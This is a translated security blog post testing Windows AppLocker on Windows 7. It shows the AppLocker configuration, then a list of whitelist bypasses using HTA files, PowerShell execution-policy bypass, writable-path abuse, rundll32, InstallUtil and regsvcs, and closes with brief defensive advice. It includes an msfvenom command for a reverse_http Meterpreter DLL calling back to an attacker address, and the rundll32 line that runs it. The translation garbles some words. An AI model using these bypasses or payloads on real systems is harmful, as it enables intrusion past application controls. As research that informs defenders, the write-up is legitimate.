Merit student · 2016/01/18 10:31

0 x00 preface

Last time we tested McAfee Application Control, this time we tested Windows AppLocker, another whitelist tool, to share the defense and attack techniques.

0 x01 profile

Windows AppLocker, or Application Control Policy, is used to control executable programs, installation programs, and scripts. Previously, it only supports Windows 7 Enterprise, Windows 7 Ultimate, and WindowsServer2008 R2. But Microsoft updated it on October 18, 2012 to support Windows8.1,Windows Server2012 R2,WindowsServer2012 and Windows8 Enterprise

As shown in figure

AppLocker can create rules for the following file formats to restrict their execution

Let’s actually test the functionality

0 x02 configuration

Test environment:

#! Bash OS: Windows7 Ultimate x86Copy the code

1. Enable the service

Go to Computer Management – Services -Application Identity and set the service to on

As shown in figure

2. Go to the AppLocker configuration page

Run secpol. MSC to go to local security policy-Application Control policy-applocker

Or gpedit. MSC – Computer Configuration -Windows Settings – Security Settings – Application Control Policy -AppLocker

As shown in figure

3. Configure rules

Set default rules for executables:

  • Allow members of the local administrator group to run all applications.
  • Allow members of the Everyone group to run applications located in Windows folders.
  • Allow members of the Everyone group to run applications located in the Program Files folder.

As shown in figure

Set the default rules for the script:

  • Allow members of the local administrator group to run all scripts.
  • Allow members of the Everyone group to run scripts located in the Program Files folder.
  • Allow members of the Everyone group to run scripts located in Windows folders.

As shown in figure

After the default rule is enabled, programs and scripts cannot be executed except in the default path

0 x03 test

1. Run exe

2. Execute the script

0x04 Security Mechanism Analysis

The test shows that the configured rules take effect and can prevent the execution of exes and scripts outside the trusted path. However, the following rules are not restricted:

  1. memory
  2. Office macros
  3. HTML Applications, for HTA files
  4. powershell

And we have mastered the bypass techniques are:

  1. Use hTA files
  2. Use jscript
  3. Using powershell
  4. Use InstallUtil
  5. Using regsvcs

In addition to our new skills, we finally found the following methods to use 🙂

0x05 Bypass method

1, the hta

successful

You may refer to (drops.wooyun.org/tips/10667)

Can be used to execute VBS and JavaScript scripts

2, right

The administrator can execute exe files and scripts without AppLocker restrictions

3, powershell

(1) You can execute the PS script

#! bash PowerShell.exe -ExecutionPolicy Bypass -FileCopy the code

(2) You can execute the PS script in the following way

#! bash Get-Content script.txt | iexCopy the code

(3) You can use shortcuts to execute Powershell

successful

You may refer to (drops.wooyun.org/tips/10667)

4. Process injection

Now that you can execute powershell scripts, you can bounce out of Meterpreter

Then try process injection

You may refer to (drops.wooyun.org/tips/11305)

If injected into a normal permission process, exe and script cannot be executed

If it is a system permission process, you can execute exe and scripts

5. Find available file paths

Scan for writable paths through the PS script

Download: go.mssec.se/AppLockerBC

(If not, I have uploaded the script to Github.)

The test is shown in figure

After the command is executed, available paths are automatically scanned

For example, select the path c:\Windows\Tasks

Normal execution of calc.js will be intercepted

But copy calc.js c:\Windows\Tasks after

To bypass interception, run c: Windows Tasks calc.js

As shown in figure

6, rundll32

(1) Execute JavaScript

A. Bounce back to an Http shell

You may refer to (drops.wooyun.org/tips/11764)

But you can’t bypass the interception of executing exe and scripts

B. Use JavaScript to execute powershell command to return HTTP shell

(2) Load a third-party DLL

A, their own DLL

Resources: blog.didierstevens.com/2010/02/04/…

According to the format of DLL, write and generate DLL upload

perform

#! bash rundll32.exe cmd.dll,Control_RunDLLCopy the code

Pop up a CMD

As shown in figure

B. Rebound meterpreter

Kali under:

#! Bash msfvenom -p Windows/meterpreter/reverse_http -f DLL LHOST = 192.168.174.133 LPORT = 8080 >. / a. d. llCopy the code

Generate A. Delaware and upload it to the test host

perform

#! bash rundll32.exe a.dll,Control_RunDLLCopy the code

Can be launched

As shown in figure

7. Use InstallUtil

Using InstallUtil.exe to execute ShellCode successfully

If you have A Microsoft.NET Framework 4.0 environment, you can use exe to execute

You may refer to (drops.wooyun.org/tips/8701 drops.wooyun.org/tips/8862)

8. Use regSVCs

successful

You may refer to (drops.wooyun.org/tips/10667)

0 x06 defense

  1. Strictly control file write permissions
  2. Disable mshta.exe to prevent HTA running
  3. Disable the powershell
  4. Prevention of rapture

0 x07 summary

As the research progressed, it became clear that using InstallUtil and RegSVCs was a great way to bypass the whitelist restrictions, especially for both attack and defense.

The technique of using Rundll32.exe is slowly being discovered.

0x08 References:

  • Technet.microsoft.com/en-us/libra…
  • Technet.microsoft.com/en-us/libra…
  • Dfir-blog.com/2016/01/03/…
  • Mssec.wordpress.com/2015/10/22/…
  • www.attackdebris.com/?p=143
  • Blog.didierstevens.com/2010/02/04/…

Download address:

Github.com/3gstudent/B…

This article was originally written by three good students and first published by Cloud Drops